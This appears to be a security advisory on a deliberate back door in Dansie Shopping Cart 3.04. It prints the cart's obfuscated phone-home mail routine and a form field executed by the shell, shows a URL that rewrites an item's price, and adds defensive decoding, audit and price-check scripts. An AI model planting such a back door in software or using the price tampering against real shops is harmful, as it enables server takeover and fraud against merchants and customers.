COMMAND
Dansie Shopping Cart
SYSTEMS AFFECTED
Dansie Shopping Cart 3.04
PROBLEM
One of our clients, while installing and configuring the Dansie
Shopping Cart, ran into difficulty integrating PGP, the shopping
cart program, and our secure server setup. While assisting our
client with the cart and PGP configuration we discovered a couple
of things. This was found by joe@blarg.net.
The CGI, under certain conditions, sends an email to the author
of the Dansie shopping cart software, 'tech@dansie.net'. This is
not readily apparent, as the code that handles this transaction
uses a simple Caesar cipher to hide the email address.
The cipher is handled via the subroutine 'there2':
sub there2
{
    $_ = "$_[0]";                                       # copy the obfuscated literal into $_
    tr/a-z0-9/gvibn9wprud2lmx8z3fa4eq15oy06sjc7kth/;    # fixed 36-character substitution table
    tr/_/-/;                                            # '_' becomes '-'
    tr/\@/\./;                                          # '@' becomes '.'
    return $_;
}
The call that creates this email address and sends the mail is the
function 'there3'.
sub there3
{
    # only on non-Windows hosts where the configured mailer binary exists
    if (($ENV{'OS'} !~ /Windows_NT/i) && ($mailprog) && (-e "$mailprog"))
    {
        $a = &there2('8v59')."\@".&there2('kte3cv').".".&there2('ev8');   # recipient, decoded
        $b = &there2('8v59_3jhhzi8');                                      # subject, decoded
        pop(@there2);                      # drop the last two entries of the global @there2 list
        pop(@there2);
        $c = &there2("@there2");           # decode what remains for the message body
        open (TECH, "|$mailprog $a");      # pipe the message to the mailer, addressed to $a
        print TECH "To: $a\n";
        print TECH "From: $a\n";
        print TECH "Subject: $b\n\n";
        print TECH "$path3\n";                                  # set elsewhere in the script
        print TECH "$ENV{'HTTP_HOST'} $ENV{'SERVER_NAME'}\n";   # the host the cart runs on
        print TECH "$c\n";
        print TECH "$e $there\n" if ($e);                       # globals set elsewhere in the script
        close (TECH);
    }
}
The ciphered strings, when passed through 'there2', result in:
8v59 == tech
kte3cv == dansie
ev8 == net
8v59_3jhhzi8 == tech-support
$a == tech@dansie.net
$b == Subject: tech-support
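The same substitution, as an added example that is not part of the advisory or the cart's code: the tr/// table from 'there2' as a Python translation table together with its inverse, so an auditor can decode every there2('...') literal in the source and compute the ciphertext a known word (such as 'dansie') appears as, in order to grep for it. The SAMPLE lines are copied from 'there3' above.

```python
import re

# Added example (not the cart's own code): the tr/// table from there2 as a
# Python translation table, plus its inverse, so an auditor can decode every
# obfuscated literal in the source and compute how a known word is hidden.
SRC = "abcdefghijklmnopqrstuvwxyz0123456789"   # tr/// search list: a-z0-9
DST = "gvibn9wprud2lmx8z3fa4eq15oy06sjc7kth"   # tr/// replacement list
assert len(SRC) == len(DST) == 36

_DECODE = str.maketrans(SRC, DST)   # the substitution there2 applies
_ENCODE = str.maketrans(DST, SRC)   # its inverse (how the literals were made)


def there2(s: str) -> str:
    """Python equivalent of the cart's there2: substitute, then '_'->'-', '@'->'.'."""
    return s.translate(_DECODE).replace("_", "-").replace("@", ".")


def obfuscate(s: str) -> str:
    """Inverse of there2: the literal a plaintext word appears as in the source,
    e.g. obfuscate('dansie') gives the string to grep for when locating $d."""
    return s.replace("-", "_").replace(".", "@").translate(_ENCODE)


_CALL = re.compile(r"there2\('([a-z0-9_@]+)'\)")


def decode_literals(perl_source: str) -> dict:
    """Map every there2('...') literal found in Perl source to its plaintext."""
    return {lit: there2(lit) for lit in _CALL.findall(perl_source)}


# Constructed sample: the two lines of there3 that build the hidden address.
SAMPLE = r"""
$a = &there2('8v59')."\@".&there2('kte3cv').".".&there2('ev8');
$b = &there2('8v59_3jhhzi8');
"""

if __name__ == "__main__":
    for lit, plain in decode_literals(SAMPLE).items():
        print(f"{lit:>14} == {plain}")
```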
This seems curious, but plausible reasons could include ensuring
license compliance, or perhaps the cart automatically sends this
email when an error occurs. The program definitely goes out of
its way to hide the fact that the mail is being sent.
While going through the rest of the code Joe discovered a much
more interesting item.
# trigger field present, and either the host is not Dansie's own ($d) or $d is unset
if ( ( ( $FORM{'?????????'}) && ($ENV{'HTTP_HOST'} !~ /($d)/) ) || ( ($FORM{'?????????'} ) && (!$d) ) )
{
    if ( $ENV{'OS'} )
    {
        system("$FORM{'?????????'}");        # Windows: the raw form value runs via the shell
    }
    else
    {
        open(ELIF,"|$FORM{'?????????'}");    # Unix: the same, through a pipe open
    }
    exit;
}
The form element '?????????', which in the original source is a
pseudo-random-looking nine-character string of letters and
numbers, allows an intruder to execute any command on the server
with the same privileges as the CGI process itself. Although this
is a full disclosure list, the trigger element is obscured to
prevent script kiddies from running away with this back door. If
you own the cart, you have access to the source code and can
discover the element in question easily enough on your own.
Further searches through the code reveal that this form element
receives no data validation whatsoever; it reaches this code
fragment unchallenged.
The '$d' variable in the condition that permits the back door to
function is set elsewhere in the program to the string 'dansie'
(again produced via the same cipher routine). This means the form
element won't work on Dansie's own host, but will work on anyone
else's. There are additional problems with the 'there' function,
but we'll leave them as exercises for the reader to decipher.
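A way for a cart owner to check their own copy for this pattern, as an added example (not part of the advisory or the cart): a source audit that flags Perl lines where a %FORM value is interpolated into something that hands a string to the shell. It is a line-level grep rather than a taint analysis, so a value first copied out of %FORM into another variable is not caught. The sample input is the back door fragment above (trigger name left as '?????????') followed by the mailer open from 'there3'.

```python
import re

# Added example (not the cart's own code): flag Perl lines where a CGI form
# value (the cart keeps them in %FORM) is interpolated into a shell sink.
_SINKS = [
    re.compile(r"\b(?:system|exec)\s*\("),   # system("...") / exec("...")
    re.compile(r'\bopen\s*\([^,]+,\s*"\|'),  # open(FH, "|cmd")  pipe-open
    re.compile(r"`[^`]+`"),                  # `cmd` backticks
]
_FORM = re.compile(r"\$FORM\{[^}]*\}")


def find_shell_sinks(perl_source: str):
    """Return (line_no, form_tainted, line) for every line with a shell sink;
    form_tainted is True when a %FORM value appears on that same line."""
    hits = []
    for n, line in enumerate(perl_source.splitlines(), 1):
        if any(s.search(line) for s in _SINKS):
            hits.append((n, bool(_FORM.search(line)), line.strip()))
    return hits


# Constructed sample: the back door fragment from the advisory (trigger name
# left as '?????????' as in the advisory) followed by there3's mailer open.
SAMPLE = r"""
if ( ( ( $FORM{'?????????'}) && ($ENV{'HTTP_HOST'} !~ /($d)/) ) || ( ($FORM{'?????????'} ) && (!$d) ) )
{
    if ( $ENV{'OS'} )
    {
        system("$FORM{'?????????'}");
    }
    else
    {
        open(ELIF,"|$FORM{'?????????'}");
    }
    exit;
}
open (TECH, "|$mailprog $a");
print TECH "To: $a\n";
""".lstrip("\n")

if __name__ == "__main__":
    for n, tainted, line in find_shell_sinks(SAMPLE):
        kind = "FORM value reaches shell" if tainted else "shell sink"
        print(f"line {n}: {kind}: {line}")
```

Lines reported with form_tainted set deserve a manual look first; the untainted mailer open is still worth reviewing because its command line is assembled from variables.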
Dansie.net, armed with the server name and URL of the CGI
executable provided by the cloaked email routine, would be able
to run commands on any web server on the Internet that has the
Dansie Shopping Cart installed. It takes little imagination to
dream up the potential havoc and privacy violations this level of
access could result in, from stealing private customer records to
a full-blown crack of an E-Commerce server.
Kasey also discovered the back door and the cloaked email routine.
Kasey also provides evidence in the post indicating that not
only is Dansie well aware of the back door routine, but may be
actively attempting to use it. Based upon Joe's own
investigation, the information Kasey posted, and our own firewall
logs (see below), it is our opinion that the back door within
Dansie.net's shopping cart can best be summarized as follows:
1. The back door is very deliberate.
2. It isn't unique to the one copy we have access to here.
3. It is being actively utilized by the author of the CGI.*
* Based upon the log snippet in Kasey's post showing attempted
access to the CGI from an Earthlink dial-up IP. According to
Kasey, access to the CGI was attempted less than 30 minutes
after the cart was installed.
When we noticed the attempted use of Kasey's server, a quick check
of our own firewall logs revealed the following:
Packet log: input REJECT eth0 PROTO=6 209.179.141.xx:1054 x.x.x.x:80
{repeated several dozen times}
We can only assume these attempts, made from the same /24 of
Earthlink's dial-up pool as the one used to probe Kasey's server,
were made by the author of the shopping cart.
If installing a backdoor in the cart software wasn't bad enough..
the whole implementation of pricing and adding items to cart is
crap.. Example form to add items to your cart (kindly provided
on the publisher's site using the demo cart they set up for us):
*snip*
<FORM METHOD=POST ACTION="http://www.dansie.net/cgi-bin/scripts/cart.pl">
Black Leather purse with leather straps<BR>
Price: $20.00<BR>
<INPUT TYPE=HIDDEN NAME=name VALUE="Black leather purse">
<INPUT TYPE=HIDDEN NAME=price VALUE="20.00">
<INPUT TYPE=HIDDEN NAME=sh VALUE="1"> <!-- Shipping and Handling -->
<INPUT TYPE=HIDDEN NAME=img VALUE="purse.jpg">
<INPUT TYPE=HIDDEN NAME=return VALUE="http://www.dansie.net/demo.html">
<INPUT TYPE=HIDDEN NAME=custom1 VALUE="Black leather purse with leather straps">
<INPUT TYPE=SUBMIT NAME="add" VALUE="Put in Shopping Cart">
</FORM>
*snip*
A couple of quick alterations and we can now add:
http://www.dansie.net/cgi-bin/scripts/cart.pl?name=piece+of+crap+cart+software&price=1.00&sh=1&img=purse.jpg&return=http://www.dansie.net/demo.html&custom1=my+shopping+cart+software+sucks+because+i+let+users+manipulate+crucial+variables
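The pricing problem and its fix side by side, as an added example that is not part of the advisory or the cart's code: the cart's behaviour of taking price and shipping straight from the hidden fields, next to a server-side check that treats the item name only as a key into the merchant's own price list. CATALOG and TAMPERED are constructed from the demo form above, with the price lowered to 1.00.

```python
from decimal import Decimal
from urllib.parse import parse_qs

# Added example (not the cart's own code): the cart's pricing, which trusts the
# hidden price/sh fields, beside a server-side check that treats the item name
# only as a key into the merchant's own price list. CATALOG is constructed.
CATALOG = {
    "Black leather purse": {"price": Decimal("20.00"), "sh": Decimal("1.00")},
}


class PriceMismatch(ValueError):
    """Form price disagrees with the catalog: tampering worth logging."""


def fields(query: str) -> dict:
    """Flatten a cart.pl-style query string to one value per field (first wins)."""
    return {k: v[0] for k, v in parse_qs(query).items()}


def line_total_trusting_form(f: dict) -> Decimal:
    """What the cart does: price and shipping come straight from the form."""
    return Decimal(f["price"]) + Decimal(f["sh"])


def line_total_from_catalog(f: dict, catalog=CATALOG) -> Decimal:
    """Hardened: look the item up server-side and refuse a submission whose
    price field disagrees, rather than silently repricing it."""
    item = catalog.get(f.get("name", ""))
    if item is None:
        raise KeyError(f"unknown item {f.get('name')!r}")
    if Decimal(f.get("price", "0")) != item["price"]:
        raise PriceMismatch(f"form price {f.get('price')} != catalog {item['price']}")
    return item["price"] + item["sh"]


# Constructed query: the demo form's fields with the price lowered to 1.00.
TAMPERED = ("name=Black+leather+purse&price=1.00&sh=1&img=purse.jpg"
            "&return=http://www.dansie.net/demo.html&custom1=Black+leather+purse")

if __name__ == "__main__":
    f = fields(TAMPERED)
    print("cart would charge:", line_total_trusting_form(f))   # 2.00
    try:
        line_total_from_catalog(f)
    except PriceMismatch as e:
        print("rejected:", e)
```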
SOLUTION
The Dansie Shopping Cart bug has been removed: it should no longer
email him anti-piracy information or allow any surreptitious
access. Craig is shipping the patch in his next update to all his
customers; due to the nature of his script, all customers need to
update on a regular basis to remain functional.